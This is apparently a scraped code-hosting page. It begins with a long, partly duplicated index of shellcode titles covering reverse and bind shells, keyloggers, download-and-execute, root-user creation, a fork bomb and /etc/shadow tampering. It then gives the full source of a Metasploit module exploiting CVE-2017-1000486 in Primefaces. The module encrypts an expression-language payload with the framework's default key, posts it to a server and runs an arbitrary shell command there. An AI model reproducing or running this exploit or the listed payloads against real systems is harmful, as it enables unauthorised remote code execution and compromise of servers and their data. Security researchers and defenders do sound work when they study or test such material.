Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes)
Windows/x86 (.Net Framework) - Execute Native x86 Shellcode

Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes)
Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)

Linux/x86-64 - execve() XOR Encoded Shellcode (84 bytes)
Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes)

Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)
Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)
Windows x86 - system(_systeminfo_) Shellcode (224 bytes)
Windows XP < 10 - Download File + Execute Shellcode
Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)
Windows/x86 - system(systeminfo) Shellcode (224 bytes)
Windows (XP < 10) - Download File + Execute Shellcode
Windows/x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)

Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:10)  Xterm Shell Shellcode (68 bytes)
Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)
Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)
Windows/x86 (7) - localhost Port Scanner Shellcode (556 bytes)
Linux/x86 - Bind TCP/UDP (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes)
Windows x86 - MessageBoxA Shellcode (242 bytes)
Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)
Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{shadow_passwd} Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{shadow_passwd} Shellcode (273 bytes)
Windows/x86 - MessageBoxA Shellcode (242 bytes)
Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes)
Windows/x86 - InitiateSystemShutdownA() Shellcode (599 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)

Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
Linux/x86-64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)

OSX/PPC - Stager Sock Find MSG_PEEK Shellcode
OSX/PPC - Stager Sock Find MSG_PEEK + Null-Free Shellcode

OSX/PPC - execve(/bin/sh) Shellcode
OSX/PPC - execve(/bin/sh) + Null-Free Shellcode

Linux/x86 - socket-proxy Shellcode (372 bytes) (Generator)
Linux/x86 - Socket-proxy Shellcode (372 bytes) (Generator)
Linux/x86 - rmdir(_/tmp/willdeleted_) Shellcode (41 bytes)
Linux/x86 - setdomainname(_th1s s3rv3r h4s b33n h1j4ck3d !!_) Shellcode (58 bytes)
Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes)
Linux/x86 - setdomainname(th1s s3rv3r h4s b33n h1j4ck3d !!) Shellcode (58 bytes)

Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (5)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)
Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) Shellcode (103 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell Shellcode (72 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (65 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method Shellcode (89 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell Shellcode (73 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
Linux/x86 - Egghunter Shellcode (38 bytes)
Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)
Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)
Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) + Null-Free Shellcode (103 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell + Null-Free Shellcode (72 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (65 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method + Null-Free Shellcode (89 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + Null-Free Shellcode (73 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)
Linux/x86 - Egghunter (0x50905090) + Null-Free Shellcode (38 bytes)
Linux/x86 - execve(/bin/sh) + Null-Free Shellcode (21 bytes) (6)
Linux/x86 - Read /etc/passwd file + Null-Free Shellcode (51 bytes)
Linux/x86 - Reboot() + Mutated + Null-Free Shellcode (55 bytes)
Linux/x86 - Fork Bomb + Mutated + Null-Free Shellcode (15 bytes)
Linux/x86 - execve wget + Mutated + Null-Free Shellcode (96 bytes)
Linux/x86 - execve(/bin/sh) + Uzumaki Encoded + Null-Free Shellcode (50 bytes)
Linux/x86 - Uzumaki Encryptor Shellcode (Generator)
Linux/x86 - Bind TCP (31337/TCP) Shell Shellcode (108 bytes)
Linux/x86 - /proc/sys/net/ipv4/ip_forward 0 + exit() Shellcode (83 bytes)
Linux/x86 - Egghunter (0x5090) Shellcode (38 bytes)
Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (30 bytes)
Linux/x86 - Bind TCP Shell Shellcode (112 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:12345/TCP) cat /etc/passwd Shellcode (111 bytes)
Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + execute Shellcode (108 bytes)
Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes)
Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes)
Linux/x86 - shift-bit execve() Encoder Shellcode (114 bytes)
Linux/x86 - execve() Using  JMP-FSTENV Shellcode (67 bytes)
Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)
Linux/x86 - shutdown -h now Shellcode (56 bytes)
Linux/x86 - Bind TCP (1337/TCP) Shell Shellcode (89 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:1337/TCP) Shell Shellcode (74 bytes)
Linux/x86 - setreuid() + execve(/usr/bin/python) Shellcode (54 bytes)
Linux/x86 - execve() + ROT-7  Shellcode (Encoder/Decoder)  (74 bytes)
Windows/x86 (NT/XP/2000/2003) - Bind TCP (8721/TCP) Shell Shellcode (356 bytes)
Windows/x86 (2000) - Reverse TCP (192.168.0.247:8721/TCP) Connect + Vampiric Import Shellcode (179 bytes)
Windows/x86 - Create Admin User (X) Shellcode (304 bytes)
Windows/x86 (XP SP3) (French) - Sleep 90 Seconds Shellcode (14 bytes)
Windows/x86 (XP Professional SP2) (English) - Wordpad Shellcode (15 bytes)
Windows/x86 (XP Professional SP2) - calc Shellcode (57 bytes)
Windows/x86 (XP Professional SP3) (French) - calc.exe Shellcode (31 bytes)
Windows/x86 - Download File (http://skypher.com/dll) + LoadLibrary + Null-Free Shellcode (164 bytes)
Windows/x86 - calc.exe + Null-Free Shellcode (100 bytes)
Windows/x86 - Message Box + Null-Free Shellcode (140 bytes)
Windows/x86 (XP SP3) (Turkish) - MessageBoxA Shellcode (109 bytes)
Windows/x86 (XP SP3) (Turkish) - calc.exe Shellcode (53 bytes)
Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (52 bytes)
Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (42 bytes)
Windows/x86 (XP SP3) (English) - calc Shellcode (16 bytes)
Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes)
Windows/x86-64 - cmd.exe WinExec() Shellcode (93 bytes)
Windows/x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)
Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)
Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)
Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)
Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution Null-Free Shellcode (72 bytes)
Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)
Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Linux/x86-64 - mkdir Shellcode (25 bytes)
Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)
Linux/x86 - Reverse TCP Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)
Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes)
Windows/x86-64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)
Windows/x86-64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Linux/x86-64 - mkdir() Shellcode (25 bytes)

Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)
Windows/x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)
Linux/x86-64 - Egghunter Shellcode (38 bytes)
Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)
Linux/x86-64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)
Windows/x86 - Executable Directory Search + Null-Free Shellcode (130 bytes)

Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)
Windows/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)

Windows x86 - Hide Console Window Shellcode (182 bytes)
Windows/x86 - Hide Console Window Shellcode (182 bytes)

Linux/ARM - chmod(_/etc/passwd__ 0777) Shellcode (39 bytes)
Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes)

Linux/SPARC - setreuid(0_0) + standard execve() Shellcode (72 bytes)
Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes)

Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes)
Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) +  Egghunter Using sys_access() Shellcode (49 bytes)

Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes)
Linux/x86 - exceve(/bin/sh) + Encoded Shellcode (44 bytes)

Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)

Windows 10 x64 - Egghunter Shellcode (45 bytes)
Windows/x86-64 (10) - Egghunter Shellcode (45 bytes)

Linux/x86 - Egghunter Shellcode (18 bytes)
Linux/x86 - Egghunter (0x50905090) + /bin/sh Shellcode (18 bytes)

Windows x86/x64 - cmd.exe Shellcode (718 bytes)
Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes)

Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)
Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes)

Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (4)

Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)
Linux/x86-64 - mkdir(evil) Shellcode (30 bytes)

Windows x64 - API Hooking Shellcode (117 bytes)
Windows/x86-64 - API Hooking Shellcode (117 bytes)
2018-01-19 05:01:43 +00:00

156 lines
No EOL
5.7 KiB
Ruby
Executable file
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit',
'Description' => %q{
This module exploits an expression language remote code execution flaw in the Primefaces JSF framework.
Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt.
},
'Author' => [ 'Bjoern Schuette' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', 'CVE-2017-1000486'],
['URL', 'http://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html'],
['URL', 'https://cryptosense.com/weak-encryption-flaw-in-primefaces/'],
['URL', 'http://schuette.se/2018/01/16/in-your-primeface/']
],
'Privileged' => true,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'DefaultOptions' =>
{
'WfsDelay' => 30
},
'DisclosureDate' => 'Feb 15 2016',
'Platform' => ['unix', 'bsd', 'linux', 'osx', 'win'],
'Arch' => ARCH_CMD,
'Targets' => [
[
'Universal', {
'Platform' => ['unix', 'bsd', 'linux', 'osx', 'win'],
'Arch' => [ ARCH_CMD ],
},
],
],
'DefaultTarget' => 0))
register_options([
Opt::RPORT(80),
OptString.new('PASSWORD', [ true , "The password to login", 'primefaces']),
OptString.new('TARGETURI', [true, 'The base path to primefaces', '/javax.faces.resource/dynamiccontent.properties.xhtml']) ,
OptString.new('CMD', [ false , "Command to execute", '']),
])
end
def encrypt_el(password, payload)
salt = [0xa9, 0x9b, 0xc8, 0x32, 0x56, 0x34, 0xe3, 0x03].pack('c*')
iterationCount = 19
cipher = OpenSSL::Cipher.new("DES")
cipher.encrypt
cipher.pkcs5_keyivgen password, salt, iterationCount
ciphertext = cipher.update payload
ciphertext << cipher.final
return ciphertext
end
def http_send_command(cmd, payloadEL)
uri = normalize_uri(target_uri.path)
encrypted_payload = encrypt_el(datastore['PASSWORD'], payloadEL)
encrypted_payload_base64 = Rex::Text.encode_base64(encrypted_payload)
encrypted_payload_base64_url_encoded = Rex::Text.uri_encode(encrypted_payload_base64)
# send the payload and execute command
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'pfdrt' => 'sc',
'ln' => 'primefaces',
'pfdrid' => encrypted_payload_base64_url_encoded
}
})
if res.nil?
vprint_error("Connection timed out")
fail_with(Failure::Unknown, "Failed to trigger the Enter button")
end
if res && res.headers && (res.code == 302 || res.code == 200)
print_good("HTTP return code #{res.code}")
else
vprint_error(res.body)
fail_with(Failure::Unknown, "#{peer} - Unknown error during execution")
end
return res
end
def exploit
cmd=""
if not datastore['CMD'].empty?
cmd = datastore['CMD']
else
cmd = payload.encoded
end
payloadEL = '${facesContext.getExternalContext().getResponse().setContentType("text/plain;charset=\"UTF-8\"")}'
payloadEL << '${session.setAttribute("scriptfactory","".getClass().forName("javax.script.ScriptEngineManager").newInstance())}'
payloadEL << '${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}'
payloadEL << '${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}'
payloadEL << '${session.getAttribute("scriptengine").eval('
payloadEL << '"var os = java.lang.System.getProperty(\"os.name\");'
payloadEL << 'var proc = null;'
payloadEL << 'os.toLowerCase().contains(\"win\")? '
payloadEL << 'proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"cmd.exe\",\"/C\",\"%s\"]).start()' % cmd
payloadEL << ' : proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"%s\"]).start();' % cmd
payloadEL << 'var is = proc.getInputStream();'
payloadEL << 'var sc = new java.util.Scanner(is,\"UTF-8\"); var out = \"\";'
payloadEL << 'while(sc.hasNext()) {out += sc.nextLine()+String.fromCharCode(10);}print(out);")}'
payloadEL << '${facesContext.getExternalContext().getResponse().getWriter().flush()}'
payloadEL << '${facesContext.getExternalContext().getResponse().getWriter().close()}';
vprint_status("Attempting to execute: #{cmd}")
resp = http_send_command(cmd, payloadEL)
print_line(resp.body.to_s)
m = resp.body.to_s
if m.empty?
print_error("This server may not be vulnerable")
end
return
end
def check
var_a = rand_text_alpha_lower(4)
payloadEL = "${facesContext.getExternalContext().setResponseHeader(\"primesecretchk\", %s" % var_a
res = http_send_command(var_a, payloadEL)
if res.headers
if res.headers["primesecretchk"] == #{var_a}
vprint_good("Victim evaluates EL expressions")
return Exploit::CheckCode::Vulnerable
end
else
vprint_error("Unable to determine due to a HTTP connection timeout")
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Safe
end
end
Reference in a new issue View git blame Copy permalink